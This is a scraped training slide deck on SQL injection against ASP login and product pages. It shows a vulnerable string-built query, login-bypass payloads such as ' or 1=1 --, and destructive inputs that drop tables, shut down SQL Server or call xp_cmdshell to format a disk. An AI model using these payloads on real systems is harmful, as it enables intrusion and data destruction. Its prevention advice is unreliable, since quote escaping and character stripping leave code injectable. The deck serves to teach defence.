Download - Sql Injection Attacks Siddhesh
![Page 1: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/1.jpg)
SQL Injection Attacks
Siddhesh Bhobe
![Page 2: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/2.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SQL Injection Attack…
…"injects" or manipulates SQL code using “string-building” techniques.
By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.
Attacks are successful due to poor input validation at code layer
![Page 3: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/3.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 1: HTML Form
Consider the following HTML form for Login:
<form name="frmLogin" action="login.asp" method="post"> Username: <input type="text" name="userName"> Password: <input type="text" name="password"> <input type="submit">
</form>
![Page 4: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/4.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 1: ASP Script
<%
…
userName = Request.Form("userName“
password = Request.Form("password")
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'“
…
%>
![Page 5: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/5.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Sample Input
Login =john, Password = doe
select count(*) from users where userName='john' and userPass='doe'
![Page 6: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/6.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Now check this!
Login = john, Password = ' or 1=1 --
select count(*) from users where userName='john' and userPass='' or 1=1 --'
Password check is nullified
-- used to prevent ASP from reporting mismatched quotes
![Page 7: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/7.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
And what about this?
Username: ' or 1=1 -- and Password: [Empty]
select count(*) from users where userName='' or 1=1 --' and userPass=''
![Page 8: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/8.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 2
Username: ' having 1=1 -- , Password: [Empty]
select userName from users where userName='' having 1=1
![Page 9: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/9.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
You get a column name…
You will get the following error message:
Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 16
![Page 10: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/10.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
The Attack…
Username: ' or users.userName like 'a%' --
select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Logged In As admin!!!
![Page 11: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/11.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Use of Semi-colon
Semi-colon allows multiple queries to be specified on one line.
Submitted as one batch and executed sequentially
select 1; select 1+2; select 1+3;
![Page 12: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/12.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Can you guess what happens?
Username: ' or 1=1; drop table users; --
![Page 13: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/13.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Table dropped!
Username: ' or 1=1; drop table users; -- and Password: [Anything]
Firstly, it would select the userName field for all rows in the users table.
Secondly, it would delete the users table
![Page 14: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/14.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SHUTDOWN WITH NOWAIT!!
…causes SQL Server to shutdown, immediately stopping the Windows service
Username: '; shutdown with nowait; --
select userName from users where userName=''; shutdown with nowait; --' and userPass=''
![Page 15: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/15.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Products.asp
http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop
But what about this?
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
![Page 16: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/16.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Wham!
Here's the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
![Page 17: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/17.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: sa
Total control of SQL Server
OS Shell at privilege of MSSQLServer service using xp_cmdshell
Ability to read, write, mutilate all data
![Page 18: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/18.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: db_owner
Read/write all data in affected database
Drop tables
Create new objects
Take control of the database
![Page 19: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/19.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: normal user (no fixed server or database roles)
Access objects to which permission is given
At best, only some few stored procedures
At worst, read/write access to all tables
Recommended!
![Page 20: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/20.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Testing for Vulnerability
Disable error handling so that errors are displayed
Input single quotes to see if the application fails
Failure indicates poor validation and corruption of SQL
![Page 21: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/21.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Preventing SQL Injection Attacks
Limit User Access
Escape Quotes
Remove culprit characters
Limit length of user input
![Page 22: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/22.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Limit User Access
Do not use “sa” account
Removed extended SPs if you are not using them. The following are couple of the most damaging ones:
xp_cmdshell
xp_grantlogin
Use SPs to abstract data access
![Page 23: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/23.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Escape Quotes
Convert single quotes to double quotes<% function stripQuotes(strWords)
stripQuotes = replace(strWords, "'", "''") end function
%>
Converts
select count(*) from users where userName='john' and userPass='' or 1=1 --'
...to this:select count(*) from users where userName='john'' and
userPass=''' or 1=1 --'
![Page 24: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/24.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Drop culprit characters
Drop character sequences like ;, --, insert and xp_
select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --
becomesselect prodName from products where
id=1 cmdshell ''format c: /q /yes '' database myDB
![Page 25: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/25.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Restrict length of user input
Limit length in the form field
Use validating functions for numeric input
Use POST, not GET
![Page 26: Sql Injection Attacks Siddhesh](https://reader033.vdocuments.site/reader033/viewer/2022061218/54b75f394a795945508b4597/html5/thumbnails/26.jpg)
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Thanks!
Original Article:
http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos…